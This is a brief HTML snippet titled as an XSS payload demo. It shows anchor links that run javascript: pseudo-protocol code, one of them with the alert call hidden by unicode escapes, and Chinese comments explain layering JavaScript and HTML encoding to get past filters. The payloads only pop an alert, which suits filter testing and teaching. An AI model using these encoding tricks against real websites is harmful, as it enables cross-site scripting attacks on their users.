XSS-Payload-JS-pseudo-protocol
by zicai
HTML
<!-- JavaScript 伪协议 + HTML 编码 -->
<a href="javascript:alert('a-href')">click me</a>
<!--
先 JavaScript 编码为
javascript:\u0061\u006C\u0065\u0072\u0074('a-href')
在 HTML 编码
-->
<a href="javascript:\u0061\u006C\u0065\u0072\u0074('a-href')">click me</a>